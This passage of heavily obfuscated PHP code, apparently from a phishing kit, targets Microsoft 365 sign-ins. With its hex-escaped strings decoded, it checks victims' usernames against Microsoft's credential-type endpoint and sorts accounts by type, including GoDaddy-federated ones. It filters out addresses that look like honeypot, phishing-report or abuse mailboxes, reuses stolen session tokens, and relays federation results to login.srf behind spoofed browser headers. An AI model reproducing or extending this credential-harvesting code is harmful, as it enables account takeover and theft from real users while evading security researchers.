        goto Da8da;
        d8804:
        $this->A20d7 = getcwd() . "\x2f\x63\x6f\162\145";
        goto Db3cd;
        A56a1:
        preg_match(
            "\57\x28\77\74\x3d\x22\x63\x61\x6e\x61\x72\171\x22\72\x22\x29\x5b\136\x22\x5d\52\57",
            $A75e0,
            $ef175
        );
        goto F4759;
        F0f14:
    }
    public function checkRole()
    {
        goto B5e00;
        Ba56c:
        Cece3:
        goto e304e;
        fa345:
        $this->status["\162\157\x6c\145"] = true;
        goto Ba56c;
        E596a:
        $this->status["\145\x64\165"] = true;
        goto E75bd;
        E75bd:
        d84ee:
        goto a12bc;
        B5e00:
        if (
            !preg_match(
                "\57\60\56\60\x2e\x7c\x72\145\x2d\x7c\x75\x73\x65\x72\55\174\122\x65\163\x70\157\156\163\145\x7c\162\55\x7c\x6e\157\x72\x65\160\x6c\171\174\x72\x65\x70\x6c\x79\174\x68\x65\154\x6c\157\174\156\145\x77\x73\x7c\x66\x65\x65\144\x62\141\x63\153\174\116\x6f\x52\x65\x70\x6c\171\x7c\162\x65\x70\154\151\x65\x73\x7c\x70\x61\162\164\x7c\110\x54\115\x4c\x7c\152\x70\147\174\142\157\165\156\x63\145\174\60\x31\x32\174\x61\x77\x61\162\144\x7c\146\x6f\162\155\x7c\146\157\x72\x6d\x61\x74\174\146\157\x72\x75\x6d\x7c\150\x6f\x73\x74\145\144\174\150\157\163\164\155\x61\x73\x74\145\162\x7c\151\156\146\157\x7c\155\141\x69\x6c\174\x70\x61\x72\x74\156\145\x72\163\174\160\x68\x69\163\150\x69\156\147\174\x71\x75\x6f\x74\145\x73\x7c\161\165\x6f\x74\x65\x7c\167\x68\x79\174\x79\157\165\x72\x7c\163\150\x6f\160\174\163\x65\143\x72\x65\164\x61\x72\171\x7c\163\x65\162\x76\151\143\145\163\174\x70\x6f\154\151\x63\171\174\157\162\144\x65\x72\x73\x7c\157\162\144\x65\x72\174\x6e\x61\x6d\x65\174\x6d\x6f\156\x65\x79\155\x61\153\145\162\x68\151\160\x7c\x65\144\x69\x74\x6f\162\x7c\144\x6f\x6d\x61\151\x6e\x73\174\x64\151\x67\151\x74\141\154\174\143\157\x6e\x74\x61\x63\x74\x7c\143\x6f\156\164\145\x6e\x74\174\x63\157\x6d\160\x6c\x61\151\x6e\164\163\174\143\x6f\155\155\165\x6e\x69\164\171\x7c\143\157\x6c\x6c\145\143\x74\151\157\156\x73\174\x63\x6f\155\x6d\x65\x6e\x74\x73\x7c\141\144\166\x65\x72\164\151\163\x69\156\x67\x7c\141\x64\x76\x69\143\145\x7c\141\x77\x61\x72\144\163\x7c\x63\x61\x72\x65\145\x72\163\x7c\143\157\x6d\x6d\165\x6e\151\143\x61\164\x69\x6f\156\x73\174\x63\x6f\155\160\x6c\x69\x61\156\143\145\x7c\145\156\161\x75\151\162\145\x73\174\x66\x6f\165\156\144\174\150\145\162\x65\174\x68\145\x6c\160\174\x68\x6f\156\x65\x79\x70\x6f\x74\x7c\x69\156\x71\165\x69\162\x69\145\163\174\x69\x6e\166\x65\156\164\157\162\x69\145\x73\174\164\x65\x63\150\174\164\x65\143\150\x6e\x69\143\141\154\164\162\x61\x69\x6e\x69\156\x67\x7c\x74\162\145\141\163\165\162\x65\162\174\165\60\60\174\166\x69\x65\167\x7c\167\145\x6c\143\157\155\145\174\x61\166\x61\151\154\x61\x62\154\x65\x7c\x6f\156\x6c\x69\x6e\145\x7c\x70\x61\171\x70\x61\x6c\174\160\x65\162\x73\x6f\156\x7c\x70\x72\145\x73\x73\174\160\162\x6f\x64\165\x63\164\174\160\162\x6f\x6a\145\143\x74\x7c\x70\162\157\160\x65\x72\x74\151\x65\x73\x7c\162\x65\x73\x65\162\166\x61\x74\x69\x6f\156\x73\x7c\162\145\x73\145\x61\x72\143\150\x7c\162\145\x74\x75\x72\156\x73\x7c\x73\145\141\162\x63\150\x7c\x73\x74\165\x64\x69\x6f\174\164\x72\x61\x69\x6e\x69\156\x67\x7c\164\x65\141\x6d\x7c\x61\143\143\157\x75\156\164\x73\174\x77\x6f\162\153\174\x77\157\162\144\x70\162\145\x73\x73\174\141\x63\143\145\x73\163\x7c\163\165\142\163\x63\162\151\x70\x74\151\157\156\x73\x7c\143\x6f\166\x69\144\174\x70\x68\x61\162\x6d\141\x63\x79\x7c\x77\x65\x62\x73\x69\164\x65\174\x63\x75\x73\x74\157\x6d\x65\162\x73\x65\162\166\151\x63\x65\x73\174\143\x75\163\x74\x6f\x6d\145\162\x7c\145\156\161\165\151\162\x79\174\145\166\x65\x6e\164\163\x2f",
                $this->Fa736
            )
        ) {
            goto Cece3;
        }
        goto fa345;
        e304e:
        if (
            !preg_match(
                "\57\x73\x74\165\144\145\156\x74\174\145\144\x75\x63\141\164\151\157\156\174\x73\143\150\x6f\157\154\174\141\143\141\144\145\155\171\174\x63\x6f\x6c\x6c\x65\147\x65\174\141\x63\x61\144\145\x6d\151\143\x7c\x75\x74\157\x72\157\156\164\157\x7c\165\167\x69\x6e\156\x69\160\145\x67\x7c\165\x63\x61\x6c\x67\x61\162\171\x7c\164\x65\141\143\x68\145\162\x7c\x75\x6d\157\156\x74\162\x65\141\x6c\174\165\x62\x63\x5c\56\x7c\143\141\x6d\x70\165\x73\174\145\x64\165\143\141\x74\x65\x7c\134\56\141\143\174\134\56\163\x63\150\x7c\134\56\145\x64\x75\57",
                $this->Fa736
            )
        ) {
            goto d84ee;
        }
        goto E596a;
        a12bc:
    }
    public function gencook($be961)
    {
        goto Efcd7;
        a7304:
        return $fc513;
        goto dc6c0;
        af936:
        $fc513 = rtrim($fc513, "\x3b\40");
        goto Ad7ee;
        A61c4:
        $B08d3 = file_get_contents($be961);
        goto F3f4b;
        Ae72d:
        acb07:
        goto A61c4;
        c536d:
        $c2c47 = json_encode([]);
        goto Ae0c7;
        cb3bf:
        foreach ($d6c0e as $D5295) {
            goto d0d6a;
            a0df0:
            f8c0f:
            goto ea3af;
            f6ad3:
            $a74ee = $D5295["\126\141\x6c\165\145"];
            goto A1769;
            d0d6a:
            $ac370 = $D5295["\116\141\x6d\x65"];
            goto f6ad3;
            A1769:
            $fc513 .= "{$ac370}\75{$a74ee}\x3b\x20";
            goto a0df0;
            ea3af:
        }
        goto f51df;
        E54ec:
        if (!is_array($d6c0e)) {
            goto D3baf;
        }
        goto cb3bf;
        Ad7ee:
        D3baf:
        goto a7304;
        Ae0c7:
        file_put_contents($be961, $c2c47);
        goto Ae72d;
        C6b26:
        $fc513 = "";
        goto E54ec;
        Efcd7:
        if (file_exists($be961)) {
            goto acb07;
        }
        goto c536d;
        F3f4b:
        $d6c0e = json_decode($B08d3, true);
        goto C6b26;
        f51df:
        Df74b:
        goto af936;
        dc6c0:
    }
    public function getCredentials()
    {
        goto B5da6;
        D2d97:
        $this->status["\154\151\x76\x65"] = false;
        goto f139c;
        Be5a4:
        $this->status["\x6c\x69\166\x65"] = "\x66\141\x6c\x73\x65";
        goto adc58;
        badb9:
        $this->status["\x74\171\160\145"] = "\144\157\x75\x62\x6c\x65";
        goto b8d91;
        aa156:
        goto E8244;
        goto Bc009;
        da03b:
        a80f5:
        goto Be677;
        c764e:
        if (
            strpos(
                $A75e0,
                "\x22\x49\146\105\170\151\x73\x74\163\122\x65\x73\165\154\x74\x22\x3a\x31"
            ) !== false
        ) {
            goto b3e35;
        }
        goto cec72;
        a3ebb:
        e4339:
        goto Ea6ff;
        bbcc3:
        if (strpos($A75e0, "\141\144\146\x73") !== false) {
            goto F9243;
        }
        goto c945a;
        fa6ca:
        $Accd6 = $Bcc9d->post(
            "\x68\x74\164\x70\x73\x3a\x2f\x2f\154\157\x67\151\156\56\155\151\x63\x72\x6f\163\157\146\164\x6f\156\154\151\156\145\x2e\x63\x6f\x6d\57\143\x6f\x6d\155\x6f\x6e\57\107\145\x74\103\162\x65\x64\145\x6e\x74\x69\x61\x6c\124\x79\x70\145\77\x6d\153\164\x3d\x65\x6e\x2d\125\123",
            [
                "\150\x65\141\x64\145\x72\163" => [
                    "\101\x63\143\145\160\x74" =>
                        "\141\x70\x70\x6c\151\x63\x61\164\151\157\x6e\57\152\x73\157\x6e",
                    "\x41\x63\x63\x65\x70\164\55\x4c\141\156\x67\x75\x61\x67\145" =>
                        "\145\156\55\x55\x53\x2c\x65\x6e\73\x71\75\60\x2e\71",
                    "\x43\x6f\156\156\x65\x63\x74\151\157\x6e" =>
                        "\153\x65\x65\160\55\x61\x6c\151\166\145",
                    "\x43\x6f\156\164\145\156\x74\x2d\x54\171\x70\145" =>
                        "\141\160\x70\x6c\x69\143\x61\164\x69\157\x6e\x2f\152\163\x6f\156\73\x20\x63\x68\141\162\x73\145\x74\x3d\125\x54\x46\x2d\x38",
                    "\x4f\162\151\x67\x69\x6e" =>
                        "\150\x74\164\x70\163\72\57\x2f\154\x6f\x67\x69\156\x2e\155\151\143\162\x6f\163\x6f\146\x74\x6f\x6e\154\x69\x6e\x65\x2e\143\x6f\x6d",
                    "\110\x70\x67\x61\143\x74" => "\61\x38\60\x30",
                    "\x48\160\x67\151\x64" => "\61\61\x30\x34",
                    "\103\141\x63\150\145\x2d\103\157\x6e\x74\162\x6f\x6c" =>
                        "\156\157\55\143\141\143\150\x65",
                    "\x50\x72\141\147\x6d\x61" =>
                        "\156\157\55\x63\x61\x63\150\x65",
                    "\x55\x73\x65\x72\55\101\x67\x65\x6e\x74" =>
                        "\x4d\x6f\x7a\151\154\154\141\x2f\65\x2e\60\40\x28\x57\151\156\x64\157\167\163\40\x4e\124\40\61\60\56\x30\73\40\127\151\x6e\66\x34\x3b\x20\x78\x36\64\x29\x20\101\160\160\x6c\x65\127\145\x62\x4b\151\164\57\65\x33\x37\56\x33\66\40\50\x4b\x48\124\x4d\x4c\x2c\x20\x6c\151\x6b\x65\40\x47\145\143\153\x6f\x29\x20\103\x68\x72\157\155\x65\x2f\x31\x32\70\56\60\x2e\60\56\60\x20\x53\x61\x66\x61\x72\151\x2f\x35\x33\x37\x2e\63\x36\x20\x45\x64\147\x2f\61\x32\x38\x2e\60\x2e\x30\56\60",
                    "\x58\x2d\x45\x64\x67\x65\x2d\123\x68\157\x70\160\151\156\x67\55\x46\154\141\147" =>
                        "\60",
                    "\103\141\156\141\162\x79" => $this->B522d,
                    "\103\154\151\x65\156\x74\55\122\x65\161\x75\145\163\164\x2d\111\x64" =>
                        $this->ad1e3,
                ],
                "\152\x73\x6f\x6e" => [
                    "\165\163\145\162\156\141\x6d\145" => $this->Fa736,
                    "\x69\163\x4f\x74\150\x65\x72\x49\x64\160\x53\x75\160\x70\157\162\164\x65\144" => false,
                    "\x63\x68\x65\x63\x6b\120\150\157\156\145\x73" => false,
                    "\x69\x73\x52\145\155\x6f\x74\x65\x4e\107\103\123\165\160\160\157\x72\164\x65\x64" => true,
                    "\x69\x73\103\x6f\x6f\x6b\151\x65\x42\141\x6e\156\x65\162\x53\x68\x6f\167\156" => false,
                    "\151\163\x46\151\144\x6f\x53\165\160\x70\x6f\162\164\145\144" => true,
                    "\x6f\162\151\147\151\156\141\154\x52\145\161\165\145\x73\x74" =>
                        $this->cc473,
                    "\143\x6f\x75\156\x74\162\x79" => "\x49\x44",
                    "\x66\x6f\162\143\145\157\x74\143\x6c\x6f\x67\x69\x6e" => true,
                    "\146\x6c\157\x77\124\157\153\145\x6e" => $this->fac50,
                ],
            ]
        );
        goto fbfe1;
        Bc009:
        Fd620:
        goto ce15b;
        D75d1:
        b8628:
        goto eca6a;
        e28c3:
        E38e6:
        goto f354b;
        c5c43:
        $Bcc9d = new Client();
        goto fa6ca;
        B5da6:
        $this->Start();
        goto c5c43;
        Cdfed:
        $this->checkRole();
        goto Fece2;
        A341a:
        fae6c:
        goto B0e10;
        E9030:
        $this->getLogo($Dee16);
        goto da03b;
        fbfe1:
        $A75e0 = $Accd6->getBody()->getContents();
        goto e70ff;
        a8024:
        preg_match(
            "\57\x28\x3f\74\x3d\42\106\154\157\x77\124\157\153\x65\x6e\42\x3a\x22\51\133\136\x22\x5d\x2a\57",
            $A75e0,
            $ea051
        );
        goto cb7ec;
        C5d72:
        b3e35:
        goto badb9;
        fa8ae:
        if (
            strpos(
                $A75e0,
                "\x46\145\144\145\x72\x61\x74\151\157\x6e\122\145\144\151\x72\145\x63\164\125\162\154"
            ) !== false
        ) {
            goto Fd620;
        }
        goto f598c;
        F316b:
        goto e35fa;
        goto C400d;
        B14f4:
        goto daa6c;
        goto C2dba;
        C132d:
        goto b8628;
        goto E4865;
        C05d5:
        if (
            !(strpos($A75e0, "\106\x6c\x6f\x77\124\x6f\153\145\x6e") !== false)
        ) {
            goto e704a;
        }
        goto fa8ae;
        Fea31:
        goto fae6c;
        goto a3ebb;
        Bb18c:
        $e03b3 = $Dc524[0];
        goto de61c;
        b8d91:
        E207e:
        goto d45d6;
        f139c:
        $this->status["\162\x65\x61\163\157\x6e"] =
            "\151\x6e\166\141\154\x69\144\55\x61\x63\x63\157\x75\156\164";
        goto B2e43;
        Ea6ff:
        $this->status["\154\151\166\145"] = false;
        goto ff55c;
        B2e43:
        e35fa:
        goto Fea31;
        cec72:
        if (
            strpos(
                $A75e0,
                "\42\x49\x66\105\x78\x69\x73\x74\163\122\x65\163\x75\154\x74\42\72\x30"
            ) !== false ||
            strpos(
                $A75e0,
                "\x22\111\146\x45\x78\151\163\x74\x73\122\x65\x73\165\154\x74\42\72\66"
            ) !== false
        ) {
            goto A40f3;
        }
        goto Dfc17;
        e70ff:
        $this->status["\x6c\x69\166\145"] = true;
        goto beda2;
        F103c:
        $this->fac50 = $ea051[0];
        goto A1402;
        adc58:
        $this->status["\x72\x65\x61\163\x6f\x6e"] =
            "\x6f\165\x74\x6c\157\157\x6b\55\141\x63\x63\157\165\156\164";
        goto c1c0b;
        bc59c:
        $this->status["\x74\x79\x70\x65"] = "\x62\165\163\x69\x6e\x65\163\163";
        goto C63db;
        C63db:
        daa6c:
        goto A2ade;
        f598c:
        if (
            strpos(
                $A75e0,
                "\42\111\146\105\x78\x69\163\x74\x73\122\x65\163\165\x6c\x74\42\72\x35"
            ) !== false
        ) {
            goto Aff49;
        }
        goto c764e;
        ce15b:
        preg_match(
            "\57\x28\77\74\75\42\106\x65\144\145\x72\141\164\151\157\x6e\x52\145\x64\x69\x72\x65\143\164\125\x72\x6c\42\72\x22\51\x5b\136\x22\x5d\x2a\57",
            $A75e0,
            $Dc524
        );
        goto Bb18c;
        c1c0b:
        $this->status["\164\x79\160\145"] = "\155\x61\x69\x6e";
        goto a8ded;
        A1402:
        $this->B522d = $a6081[0];
        goto Cdfed;
        B0e10:
        if (!$this->status["\x6c\151\x76\x65"]) {
            goto a80f5;
        }
        goto a8024;
        eca6a:
        goto C2718;
        goto e28c3;
        cb7ec:
        preg_match(
            "\x2f\50\x3f\74\75\x22\x61\160\x69\x43\141\156\141\x72\171\x22\72\42\51\133\136\x22\x5d\x2a\57",
            $A75e0,
            $a6081
        );
        goto F103c;
        Dfc17:
        $this->status["\x6c\151\166\145"] = false;
        goto B14f4;
        d83c7:
        $this->status["\x72\x65\x64\x69\x72\x65\x63\x74"] = $e03b3;
        goto Ef851;
        E4865:
        F9243:
        goto D2cc2;
        de61c:
        if (
            strpos(
                $A75e0,
                "\163\163\157\x2e\x67\157\x64\141\144\144\x79\x2e\x63\x6f\155"
            ) !== false
        ) {
            goto E38e6;
        }
        goto bbcc3;
        Be40f:
        $this->getBackground($Dee16);
        goto E9030;
        C5de3:
        Aff49:
        goto Be5a4;
        Fece2:
        $Dee16 = json_decode($A75e0, true);
        goto Be40f;
        ff55c:
        $this->status["\x72\x65\x61\x73\157\156"] =
            "\151\156\166\141\x6c\x69\x64\55\144\x6f\x6d\141\x69\156";
        goto A341a;
        a8ded:
        C5ae0:
        goto aa156;
        Ef851:
        E8244:
        goto F316b;
        C400d:
        e704a:
        goto D2d97;
        F5fcb:
        C2718:
        goto d83c7;
        f354b:
        $e03b3 = str_replace(
            "\150\164\164\160\x73\x3a\57\x2f\x73\x73\x6f\56\147\x6f\144\x61\x64\x64\171\x2e\143\x6f\x6d\x2f",
            "\150\164\x74\160\x73\x3a\57\x2f\163\163\157\56\147\x6f\x64\141\144\x64\171\x2e\x63\x6f\155\57\x76\61\57",
            $e03b3
        );
        goto ab720;
        D2cc2:
        $this->status["\164\x79\x70\x65"] = "\x72\145\144\151\162\x65\x63\164";
        goto D75d1;
        c945a:
        $this->status["\164\171\160\x65"] = "\162\x65\x64\x69\162\145\x63\164";
        goto C132d;
        d45d6:
        goto C5ae0;
        goto C5de3;
        ab720:
        $this->status["\x74\x79\x70\145"] = "\147\157\144\x61\x64\144\x79";
        goto F5fcb;
        A2ade:
        goto E207e;
        goto C5d72;
        C2dba:
        A40f3:
        goto bc59c;
        beda2:
        if (
            strpos(
                $A75e0,
                "\42\x54\x68\x72\x6f\164\x74\x6c\x65\x53\164\x61\x74\x75\163\x22\72\61"
            ) !== false &&
            !(
                strpos(
                    $A75e0,
                    "\106\145\x64\x65\162\x61\164\x69\x6f\156\122\145\144\x69\162\x65\x63\164\x55\162\154"
                ) !== false
            )
        ) {
            goto e4339;
        }
        goto C05d5;
        Be677:
    }
    private function getBackground($A75e0)
    {
        goto A8919;
        f352b:
        $this->status["\142\x61\x63\x6b\147\162\x6f\x75\156\144"] =
            $A75e0["\x45\163\x74\163\x50\x72\157\x70\x65\162\164\x69\x65\163"][
                "\125\x73\145\x72\x54\145\156\x61\156\164\x42\162\x61\156\144\x69\x6e\147"
            ][0]["\111\154\x6c\x75\x73\x74\162\141\164\151\157\156"];
        goto efecc;
        efecc:
        Ad6fd:
        goto A0ed1;
        A8919:
        if (
            !(
                isset(
                    $A75e0[
                        "\x45\163\x74\163\x50\x72\157\x70\x65\x72\x74\151\145\163"
                    ][
                        "\125\163\145\x72\x54\x65\x6e\x61\156\x74\x42\x72\141\156\x64\x69\x6e\147"
                    ]
                ) &&
                is_array(
                    $A75e0[
                        "\x45\163\164\163\x50\x72\157\160\145\162\164\x69\145\163"
                    ][
                        "\125\x73\145\x72\124\x65\156\141\x6e\x74\102\162\x61\x6e\x64\x69\156\147"
                    ]
                ) &&
                isset(
                    $A75e0[
                        "\x45\x73\164\163\x50\x72\157\x70\145\x72\164\x69\x65\x73"
                    ][
                        "\x55\x73\145\162\124\x65\156\141\156\164\102\x72\x61\x6e\144\x69\156\147"
                    ][0]["\111\x6c\154\x75\163\164\162\141\x74\x69\157\156"]
                )
            )
        ) {
            goto Ad6fd;
        }
        goto f352b;
        A0ed1:
    }
    private function getLogo($A75e0)
    {
        goto d33b6;
        F9fb7:
        ad4ce:
        goto Eff9f;
        d33b6:
        if (
            !(
                isset(
                    $A75e0[
                        "\x45\x73\164\163\120\x72\x6f\160\145\162\164\x69\x65\x73"
                    ][
                        "\125\x73\145\162\x54\x65\x6e\x61\156\x74\102\x72\x61\x6e\x64\151\156\147"
                    ]
                ) &&
                is_array(
                    $A75e0[
                        "\105\163\x74\x73\x50\x72\x6f\x70\x65\x72\x74\x69\x65\x73"
                    ][
                        "\x55\163\145\162\124\145\156\x61\156\x74\102\162\141\156\144\x69\156\x67"
                    ]
                ) &&
                isset(
                    $A75e0[
                        "\105\163\164\163\120\162\157\x70\x65\162\164\x69\145\x73"
                    ][
                        "\x55\163\x65\162\124\x65\x6e\x61\x6e\x74\102\x72\141\x6e\x64\151\156\147"
                    ][0]["\x42\141\156\x6e\x65\x72\x4c\157\147\157"]
                )
            )
        ) {
            goto ad4ce;
        }
        goto d58f0;
        d58f0:
        $this->status["\151\x63\157\156"] =
            $A75e0["\x45\x73\164\163\120\x72\157\x70\x65\162\x74\151\145\x73"][
                "\x55\x73\x65\x72\124\145\x6e\x61\156\x74\102\x72\141\156\144\x69\x6e\x67"
            ][0]["\102\141\156\x6e\145\x72\x4c\x6f\147\x6f"];
        goto F9fb7;
        Eff9f:
    }
    public function Login()
    {
        goto Bdd30;
        d2a7c:
        if (
            $this->status["\x74\171\x70\x65"] == "\147\x6f\x64\x61\144\144\x79"
        ) {
            goto c924b;
        }
        goto d00ba;
        b12df:
        goto F5d41;
        goto Fa626;
        a8738:
        $this->status = $_SESSION["\163\x74\141\164\165\x73"];
        goto F7a88;
        C69f6:
        if (
            isset(
                $_SESSION[
                    "\151\x6e\146\x6f\137\x74\x6f\x6b\145\156\x5f\143\x72\145\x64\x65\x6e\164\151\141\154\x73"
                ]
            ) &&
            isset($_SESSION["\163\164\x61\164\165\163"])
        ) {
            goto D443f;
        }
        goto b559f;
        D2171:
        $this->Login();
        goto b6dc9;
        d00ba:
        if (
            $this->status["\x74\x79\160\x65"] ==
            "\x72\145\144\151\x72\x65\x63\x74"
        ) {
            goto e1b2e;
        }
        goto B674f;
        Dbc71:
        $this->AuthBusiness();
        goto a2177;
        Ae5bf:
        $this->ad1e3 =
            $_SESSION[
                "\x69\x6e\x66\x6f\137\x74\157\x6b\145\156\137\x63\x72\145\144\x65\x6e\x74\151\x61\x6c\x73"
            ]["\162\145\161\165\x65\163\164\137\x69\144"];
        goto fff5f;
        e0629:
        if (
            !(
                !$this->status["\x6c\x69\x76\145"] &&
                isset(
                    $_SESSION[
                        "\x69\156\x66\157\137\x74\x6f\x6b\145\156\137\143\x72\x65\x64\x65\x6e\164\151\141\154\163"
                    ]
                ) &&
                isset($_SESSION["\x73\164\x61\x74\x75\163"])
            )
        ) {
            goto Ce0ce;
        }
        goto Cc456;
        ce293:
        $this->E423c =
            $_SESSION[
                "\x69\x6e\x66\x6f\137\x74\x6f\153\x65\x6e\x5f\143\x72\x65\x64\x65\x6e\164\x69\141\154\x73"
            ]["\163\x65\x73\x73\151\x6f\x6e\137\151\144"];
        goto Ae5bf;
        a4fea:
        $this->AuthRedirect();
        goto f3469;
        Fa626:
        D443f:
        goto a8738;
        d3b03:
        Df417:
        goto d2a7c;
        a2177:
        c2ce7:
        goto C0c61;
        dc4f2:
        c924b:
        goto e30a4;
        B55af:
        e5163:
        goto fb2d2;
        fff5f:
        F5d41:
        goto Dab0a;
        e9487:
        goto c7ce3;
        goto Fbf1f;
        fbc25:
        $this->getCredentials();
        goto d3b03;
        A520b:
        Dba71:
        goto fbc25;
        Bdd30:
        if (
            $this->Fa736 != $_SESSION["\145\155\141\x69\x6c"] &&
            (!isset($_SESSION["\x73\x74\141\x74\x75\x73"]) ||
                !isset(
                    $_SESSION[
                        "\x69\x6e\146\157\137\x74\157\153\145\156\137\143\162\145\x64\x65\156\164\x69\141\154\163"
                    ]
                ))
        ) {
            goto Dba71;
        }
        goto C69f6;
        C7569:
        $this->B522d =
            $_SESSION[
                "\151\x6e\x66\157\x5f\164\x6f\153\145\156\x5f\x63\162\145\x64\145\156\164\x69\141\154\163"
            ]["\141\160\151\x5f\x63\x61\156\x61\162\171"];
        goto ce293;
        f3469:
        c7ce3:
        goto c464d;
        c464d:
        goto C72a0;
        goto dc4f2;
        F0c39:
        $this->fac50 =
            $_SESSION[
                "\x69\x6e\146\157\x5f\x74\157\153\145\x6e\x5f\143\162\x65\144\145\x6e\164\151\x61\x6c\163"
            ]["\163\x46\124"];
        goto C6476;
        Fbf1f:
        e1b2e:
        goto a4fea;
        b6dc9:
        Ce0ce:
        goto ca655;
        C6476:
        $this->cc473 =
            $_SESSION[
                "\151\156\146\157\137\164\x6f\153\x65\x6e\137\143\x72\x65\x64\x65\156\164\151\141\154\163"
            ]["\163\103\164\170"];
        goto Ebea2;
        D66bb:
        f2858:
        goto e9487;
        F7a88:
        $this->A20d7 = getcwd() . "\x2f\x63\x6f\162\145";
        goto F0c39;
        a184b:
        C72a0:
        goto e0629;
        C0c61:
        goto f2858;
        goto B55af;
        b559f:
        $this->getCredentials();
        goto b12df;
        fb2d2:
        $this->AuthDouble();
        goto D66bb;
        Cc456:
        unset(
            $_SESSION[
                "\x69\x6e\x66\x6f\137\x74\157\x6b\x65\156\x5f\143\x72\145\x64\x65\156\164\x69\x61\x6c\163"
            ]
        );
        goto b0917;
        B674f:
        if ($this->status["\x74\171\160\x65"] == "\x64\x6f\x75\x62\154\145") {
            goto e5163;
        }
        goto f8c25;
        e30a4:
        $this->AuthGodaddy();
        goto a184b;
        b0917:
        unset($_SESSION["\163\x74\x61\x74\165\x73"]);
        goto D2171;
        Dab0a:
        goto Df417;
        goto A520b;
        Ebea2:
        $this->B5b07 =
            $_SESSION[
                "\151\x6e\146\157\137\x74\157\153\145\x6e\x5f\x63\x72\145\x64\145\156\x74\151\x61\154\163"
            ]["\x63\141\156\141\x72\171"];
        goto C7569;
        f8c25:
        if (
            !(
                $this->status["\x74\x79\x70\x65"] ==
                "\142\165\163\151\x6e\145\x73\x73"
            )
        ) {
            goto c2ce7;
        }
        goto Dbc71;
        ca655:
    }
    private function AuthGodaddy()
    {
        goto f962d;
        c664f:
        $this->fac50 = $ea051[0];
        goto Be661;
        Bca5a:
        $Accd6 = $Bcc9d->post(
            "\x68\164\164\160\163\x3a\x2f\57\154\157\x67\151\156\x2e\155\151\x63\162\x6f\163\x6f\146\x74\x6f\x6e\154\151\156\145\56\143\157\155\57\x6c\x6f\x67\151\x6e\56\x73\162\x66",
            [
                "\x68\x65\141\144\x65\162\163" => [
                    "\x41\x63\143\145\160\x74" =>
                        "\x74\145\170\x74\x2f\x68\x74\x6d\154\x2c\141\x70\160\x6c\x69\143\141\164\151\x6f\x6e\x2f\x78\150\164\155\x6c\53\170\x6d\154\54\141\x70\x70\x6c\x69\x63\141\x74\151\157\156\x2f\x78\155\x6c\x3b\x71\x3d\x30\56\71\x2c\151\155\141\147\145\57\x61\166\151\x66\x2c\x69\x6d\x61\x67\x65\x2f\x77\145\x62\160\x2c\x69\155\141\x67\x65\x2f\141\x70\x6e\x67\54\x2a\x2f\x2a\73\161\x3d\x30\56\x38\x2c\x61\160\x70\154\x69\x63\x61\164\x69\x6f\156\57\x73\151\147\x6e\x65\x64\x2d\x65\x78\x63\150\x61\x6e\147\145\73\x76\75\142\63\73\x71\x3d\60\56\x37",
                    "\101\143\143\x65\160\x74\55\x4c\x61\x6e\x67\x75\x61\147\145" =>
                        "\x65\x6e\55\x55\123\54\145\x6e\73\x71\x3d\60\x2e\x39",
                    "\x43\x61\143\150\145\55\103\x6f\x6e\164\x72\157\154" =>
                        "\x6d\141\x78\55\x61\147\145\75\60",
                    "\103\157\156\x6e\145\143\164\x69\157\x6e" =>
                        "\x6b\x65\x65\160\x2d\141\x6c\x69\x76\x65",
                    "\103\x6f\156\x74\x65\x6e\x74\x2d\x54\x79\x70\x65" =>
                        "\x61\x70\160\154\151\143\x61\164\151\157\x6e\x2f\170\55\167\x77\x77\x2d\x66\x6f\162\x6d\55\165\x72\x6c\x65\x6e\x63\x6f\144\145\x64",
                    "\x4f\162\151\147\151\x6e" => "\156\x75\x6c\154",
                    "\123\x65\143\x2d\106\x65\x74\x63\150\55\x44\145\x73\164" =>
                        "\144\157\x63\165\x6d\x65\x6e\x74",
                    "\x53\145\x63\55\106\x65\x74\143\x68\x2d\x4d\x6f\144\145" =>
                        "\156\x61\x76\x69\x67\x61\164\x65",
                    "\x53\145\x63\x2d\x46\145\164\143\150\x2d\123\151\x74\145" =>
                        "\x63\x72\157\163\163\55\163\151\164\x65",
                    "\125\160\x67\x72\141\144\145\x2d\111\156\x73\145\x63\165\x72\145\55\x52\145\x71\165\x65\x73\x74\163" =>
                        "\61",
                    "\125\x73\145\x72\55\x41\147\x65\156\x74" =>
                        "\x4d\x6f\172\151\154\154\x61\x2f\x35\x2e\60\40\50\x4c\x69\156\165\x78\73\40\x41\x6e\x64\x72\x6f\151\x64\40\x36\x2e\60\x3b\40\x4e\x65\x78\x75\163\x20\x35\40\x42\x75\151\154\144\57\115\122\101\x35\70\x4e\51\40\x41\160\x70\x6c\x65\x57\x65\142\x4b\x69\164\57\65\63\x37\56\63\66\x20\50\113\110\124\115\x4c\54\x20\x6c\x69\x6b\x65\x20\x47\x65\143\153\x6f\x29\40\x43\150\162\x6f\155\x65\x2f\61\63\60\56\60\x2e\x30\x2e\60\x20\115\x6f\x62\x69\x6c\145\40\x53\x61\x66\141\162\151\57\65\63\x37\x2e\x33\x36\x20\x45\144\147\57\61\x33\60\56\60\x2e\60\x2e\x30",
                    "\x58\x2d\105\x64\x67\x65\x2d\123\150\x6f\160\x70\x69\156\147\55\x46\x6c\x61\147" =>
                        "\60",
                    "\x73\x65\143\x2d\x63\150\x2d\165\141" =>
                        "\x22\x43\150\162\157\x6d\151\x75\x6d\x22\x3b\x76\75\x22\61\63\x30\x22\54\40\x22\x4d\x69\x63\x72\x6f\163\x6f\x66\x74\x20\105\144\147\145\42\x3b\x76\75\42\x31\x33\x30\x22\x2c\x20\x22\x4e\x6f\x74\77\x41\137\x42\162\x61\156\144\x22\x3b\x76\x3d\42\71\71\42",
                    "\x73\x65\x63\55\x63\150\x2d\165\x61\55\x6d\x6f\142\151\154\x65" =>
                        "\x3f\x31",
                    "\x73\x65\x63\x2d\143\x68\x2d\165\141\x2d\160\x6c\x61\164\x66\157\162\155" =>
                        "\42\101\x6e\x64\x72\157\151\144\x22",
                    "\163\x65\143\x2d\143\150\55\x75\141\x2d\x70\x6c\x61\164\x66\157\162\x6d\x2d\x76\x65\162\163\x69\157\156" =>
                        "\42\66\x2e\60\42",
                ],
                "\146\x6f\x72\155\137\160\141\x72\x61\x6d\163" => [
                    "\x77\x63\164\x78" => $F84f2,
                    "\167\x61" => "\x77\x73\x69\147\156\151\x6e\x31\56\60",
                    "\x77\162\145\163\x75\154\x74" => $e65e8,
                    "\167\164\162\x65\x61\154\x6d" =>
                        "\x75\162\156\x3a\x66\145\x64\145\162\141\164\x69\157\x6e\72\115\151\x63\162\157\163\157\146\164\117\156\x6c\151\156\x65",
                ],
            ]
        );
        goto f61a8;
        ebb5c:
        if (
